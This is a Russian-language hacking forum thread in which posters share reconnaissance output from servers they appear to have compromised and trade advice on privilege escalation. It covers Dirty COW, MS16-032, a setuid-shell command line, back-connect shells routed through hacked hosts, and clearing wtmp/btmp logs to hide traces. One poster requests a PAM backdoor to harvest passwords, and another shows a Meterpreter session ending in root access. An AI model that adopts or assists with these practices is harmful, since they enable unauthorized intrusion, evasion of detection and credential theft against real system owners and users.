    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libticw.so.5 -> libticw.so.5.7
    -rw-r--r--  1 root root   71736 2008-12-14 23:27:29.000000000 +0300 libticw.so.5.7
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
    -rw-r--r--  1 root root   29264 2008-09-05 15:21:18.000000000 +0400 libusb-0.1.so.4.4.4
    -rw-r--r--  1 root root    9684 2011-01-08 09:59:32.000000000 +0300 libutil-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:39:24.000000000 +0400 libutil.so.1 -> libutil-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libuuid.so.1 -> libuuid.so.1.2
    -rw-r--r--  1 root root   12912 2008-10-13 07:33:34.000000000 +0400 libuuid.so.1.2
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libwrap.so.0 -> libwrap.so.0.7.6
    -rw-r--r--  1 root root   31168 2008-07-26 03:45:03.000000000 +0400 libwrap.so.0.7.6
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libxtables.so.0 -> libxtables.so.0.0.0
    -rw-r--r--  1 root root   18380 2009-02-09 22:52:34.000000000 +0300 libxtables.so.0.0.0
    drwxr-xr-x  2 root root    4096 2010-11-11 17:57:28.000000000 +0300 lsb
    drwxr-xr-x  5 root root    4096 2016-01-21 14:15:29.181003302 +0400 modules
    drwxr-xr-x  2 root root    4096 2010-11-11 17:58:14.000000000 +0300 security
    drwxr-xr-x 15 root root    4096 2010-11-11 17:57:27.000000000 +0300 terminfo
    drwxr-xr-x  3 root root    4096 2013-04-29 14:38:26.000000000 +0400 udev
    drwxr-xr-x  2 root root    4096 2010-11-11 17:57:51.000000000 +0300 xtables
    Code:
    $ mount 2>&1
    /dev/simfs on / type simfs (rw,relatime,usrquota,grpquota)
    proc on /proc type proc (rw,relatime)
    sysfs on /sys type sysfs (rw,relatime)
    tmpfs on /lib/init/rw type tmpfs (rw,nosuid,relatime,mode=755)
    tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev,relatime)
    devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600,ptmxmode=000)
    binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,nosuid,nodev,noexec,relatime)
    Code:
    $ df -h 2>&1
    Filesystem            Size  Used Avail Use% Mounted on
    /dev/simfs             50G   36G   15G  71% /
    tmpfs                 1.0G     0  1.0G   0% /lib/init/rw
    tmpfs                 1.0G     0  1.0G   0% /dev/shm
    Code:
    $ cat /etc/issue 2>&1
    Debian GNU/Linux 5.0 \n \l
    Code:
    $ cat /etc/crontab 2>&1
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.
    
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    
    # m h dom mon dow user    command
    12 * * * * root cd / && run-parts --report /etc/cron.hourly
    53 4 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    46 0 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    55 5 30 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    
    
    Code:
    $ cat /proc/version 2>&1
    Linux version 2.6.32-37-pve (root@lola) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1 SMP Wed Feb 11 10:00:27 CET 2015
    Code:
    $ cat /proc/sys/vm/mmap_min_addr 2>&1
    4096
    Code:
    $ ls -la /usr/bin/staprun 2>&1
    ls: cannot access /usr/bin/staprun: No such file or directory
     
  4. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    Проверяли dirtyc0w?
     
    zifus and t0ma5 like this.
  5. zifus

    zifus Member

    Joined:
    15 Aug 2015
    Messages:
    84
    Likes Received:
    10
    Reputations:
    0
    Да, не подходит
     
  6. Rastamanka

    Rastamanka Elder - Старейшина

    Joined:
    26 Nov 2008
    Messages:
    444
    Likes Received:
    11
    Reputations:
    7
    Linux easymoneyeasylife.org 2.6.32-642.11.1.el6.x86_64 #1 SMP Fri Nov 18 19:25:05 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

    total 48
    dr-xr-xr-x. 10 root root 4096 2016-12-17 15:45:47.044000005 +0200 .
    dr-xr-xr-x. 22 root root 4096 2016-12-17 15:50:37.719000033 +0200 ..
    drwxr-xr-x. 3 root root 4096 2016-12-17 15:45:47.044000005 +0200 alsa
    drwxr-xr-x. 3 root root 4096 2016-12-17 15:44:55.387000010 +0200 crda
    drwxr-xr-x. 46 root root 12288 2016-12-17 15:46:04.550000005 +0200 firmware
    drwxr-xr-x. 6 root root 4096 2016-12-17 15:44:23.373000005 +0200 kbd
    dr-xr-xr-x. 3 root root 4096 2016-12-17 15:44:36.126000005 +0200 modules
    drwxr-xr-x. 2 root root 4096 2016-05-11 02:18:18.000000000 +0300 security
    drwxr-xr-x. 6 root root 4096 2016-12-17 15:42:48.750000003 +0200 terminfo
    drwxr-xr-x. 5 root root 4096 2016-12-17 16:17:53.602000064 +0200 udev

    /dev/vda3 on / type ext4 (rw)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/vda1 on /boot type ext4 (rw)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

    Filesystem Size Used Avail Use% Mounted on
    /dev/vda3 9.3G 1.4G 7.4G 16% /
    tmpfs 371M 0 371M 0% /dev/shm
    /dev/vda1 240M 34M 194M 15% /boot

    CentOS release 6.8 (Final)
    Kernel \r on an \m

    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=root
    HOME=/

    # For details see man 4 crontabs

    # Example of job definition:
    # .---------------- minute (0 - 59)
    # | .------------- hour (0 - 23)
    # | | .---------- day of month (1 - 31)
    # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
    # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
    # | | | | |
    # * * * * * user-name command to be executed

    Linux version 2.6.32-642.11.1.el6.x86_64 (mockbuild@c1bm.rdu2.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-17) (GCC) ) #1 SMP Fri Nov 18 19:25:05 UTC 2016

    4096

    ---s--x---. 1 root stapusr 183072 May 11 2016 /usr/bin/staprun


    -rwsr-xr-x. 1 root root 34904 May 11 2016 /bin/su
    -rwsr-xr-x. 1 root root 36488 May 10 2016 /bin/ping6
    -rwsr-xr-x. 1 root root 53472 Nov 18 17:38 /bin/umount
    -rwsr-xr-x. 1 root root 77336 Nov 18 17:38 /bin/mount
    -rwsr-xr-x. 1 root root 38264 May 10 2016 /bin/ping
    -rwsr-xr-x. 1 root root 70480 May 11 2016 /usr/bin/chage
    -rws--x--x. 1 root root 20184 Nov 18 17:38 /usr/bin/chfn
    ---s--x---. 1 root stapusr 183072 May 11 2016 /usr/bin/staprun
    -rwsr-xr-x. 1 root root 51784 Aug 23 21:36 /usr/bin/crontab
    -rws--x--x. 1 root root 20056 Nov 18 17:38 /usr/bin/chsh
    -rwsr-xr-x. 1 root root 54496 Feb 19 2015 /usr/bin/at
    -rwsr-xr-x. 1 root root 75640 May 11 2016 /usr/bin/gpasswd
    -rwsr-xr-x. 1 root root 22544 Mar 17 2015 /usr/bin/pkexec
    -rwsr-xr-x. 1 root root 30768 Nov 23 2015 /usr/bin/passwd
    -rwsr-xr-x. 1 root root 40240 May 11 2016 /usr/bin/newgrp
    ---s--x--x. 1 root root 123832 Dec 7 02:36 /usr/bin/sudo
    -rwsr-xr-x. 1 root root 14368 Mar 17 2015 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rwsr-xr-x. 1 root root 257824 May 12 2016 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x. 1 abrt abrt 10296 May 11 2016 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
    -rws--x--x. 1 root root 14280 May 10 2016 /usr/libexec/pt_chown
    -rws--x--x 1 root root 42288 Aug 22 2010 /usr/sbin/userhelper
    -r-s--x--- 1 root apache 13984 Nov 19 01:49 /usr/sbin/suexec
    -rwsr-xr-x. 1 root root 9000 Jul 12 19:40 /usr/sbin/usernetctl
    -rwsr-x--- 1 root dbus 50552 Apr 22 2015 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x. 1 root root 10272 May 11 2016 /sbin/pam_timestamp_check
    -rwsr-xr-x. 1 root root 34840 May 11 2016 /sbin/unix_chkpwd

    Пробовала enlightenment. Результатов не дало(
    Хотя как я поняла там нету компилятора(((
     
    #626 Rastamanka, 17 Dec 2016
    Last edited: 17 Dec 2016
  7. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Скажите а с таким пользователем 33 ( www-data ) Group: 33 ( www-data ) можно запускать баш команды? Для выполнения эксплоита!
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    ты сначала проверь наличие gcc< perl< python на чем там твой сплоит, все зависит от настройки сервера
     
  9. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    gcc нет на сервере, перл питон есть! Dirty COW хочу попробовать
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,594
    Likes Received:
    1,242
    Reputations:
    273
    ну так сначала бэк коннект замути, так что бы консоль была, а дальше дерзай, из всо у меня не всегда получалось , пробовал сторонний перл скрипт на открытие порта и коннекта к своей машине, как консоль откроешьЮ пробуй уже все варианты, про безопасность не забывай
     
  11. roman921

    roman921 Member

    Joined:
    24 May 2015
    Messages:
    293
    Likes Received:
    22
    Reputations:
    0
    Ребята, подскажите какие эксплойты можно попробовать на windows server 2003 sp2 r2 (точно не знаю есть ли там r2), винда 32 битная.
    На 7 нашел ms16-032 powershell скрипт, на 7 64 битной выдал права. Но проблема в том, что 2003 машина не имеет еще powershell, можно ли без прав админа как-то портабельно поставить ее туда или только переписывать код на с++, c# ?
    Кстати может кто посоветовать подборку эксплойтов для повышения привелегий в 2003 сервере 32 битном.
     
  12. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Реализация на C#
    https://www.exploit-db.com/exploits/39809/
     
  13. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,959
    Likes Received:
    1,217
    Reputations:
    704
  14. altblitz

    altblitz Elder - Старейшина

    Joined:
    5 Jun 2009
    Messages:
    3,227
    Likes Received:
    2,607
    Reputations:
    230
    Code:
    char *cmd = "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh\n";
    Где эксплойт?
    Запустить из /tmp копию исполняемого файла sh, претендующего на шелл?
     
  15. dw0rd007

    dw0rd007 New Member

    Joined:
    11 Jul 2015
    Messages:
    45
    Likes Received:
    3
    Reputations:
    0
    Парни приветсвую. Есть фря 10.2, 2015 года.

    Есть ли сплоит под нее? Есть может кто сможет помочь с POC довести до боевого сплоита?

    https://cturt.github.io/sendmsg.html


    И еще, подскажите какойнить рутки\PAM бекдор(для linux уже) что бы собрать пароли которые вводятся при входе, да и принимало "мастер" пасс
     
  16. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    Парни, подскажите по ситуации:
    есть сработавший Dirty CoW.
    Подключен через netcat. Соответственно юзера сменить не могу. через su или login.
    expect не установлен.

    Шо робити?)
     
  17. dw0rd007

    dw0rd007 New Member

    Joined:
    11 Jul 2015
    Messages:
    45
    Likes Received:
    3
    Reputations:
    0
    Используй бекконект с tty (к примеру python-pty-shells-master ,тогда сможешь пользователя сменить) Либо подключайся по ssh. не забудь почистить
    /var/log/wtmp /var/log/btmp
     
  18. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    Так, народ, требую вашей помощи ибо всего навалилось и мозг опух... Вопросов будет несколько, они покажутся вам нубскими, но мне похуй лучше показаться тупым, но узнать, чем не узнать.

    1 - бэк-коннект. Для этого нужен выделенный IP адрес, верно? Если его нету, но используется VPN бэк-коннект возможен?
    2 - бинд-порт. Вроде бы понятно. но как забиндить порт для TTY сессии? верней заспаунить TTY сессию, которая подождет пока я к ней подключюсь.
    3 - бинарный шелл. если есть машина, где не компилится ничего, и вообще админ - уебок и не работает половина функций, то вроде как, ко слухам, можно запусть ./bind_port бинарник и он забиндит порт, т.к. ип у меня не выделенный, предварительно скомпилировав этот самый бинарник либо на подобной конфигурации либо используя msfvenom. ЭТО ТАК?!
    4 - чем потом к этому порту подключатся? я серьезно блять чем?? netcat не подходит вроде?


    это и так понятно.
    есть конкретные условия. И да, ломаный дедик в сомали не поможет с TTY



    Хуй с ним, разобрался сам.
    1 - нет
    2 - нихуя не разобрался
    3 и 4
    вот гайд http://netsec.ws/?p=331


    так, а теперь новые вопросы в студию, для вас от меня:
    [*] Meterpreter session 3 opened (*****:45835 -> *****:3443) at 2017-03-15 16:07:22 -0600
    meterpreter > shell
    su firefart
    su: must be run from a terminal
    sudo su
    sudo: no tty present and no askpass program specified

    на сколько я понял адмие ебнулся и отключил TTY? это вообще блять нормально?!

    вапрiс: как перелогинится из www-data без прав в firefart с правави root?

    p.s. сори за емоции, реально трудный день...
     
    #638 ACat, 15 Mar 2017
    Last edited: 16 Mar 2017
  19. {iddqd}

    {iddqd} Member

    Joined:
    22 Dec 2011
    Messages:
    192
    Likes Received:
    96
    Reputations:
    2
    1) можно бек коннектица на ломаный дедик с выделенным ip
    или vps сервер в Сомали
     
  20. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    163
    Likes Received:
    31
    Reputations:
    0
    firefart@rz ~ # id
    uid=0(firefart) gid=0(root) groups=0(root)
    помог ssh

    но вопрос остался без ответа
     
Loading...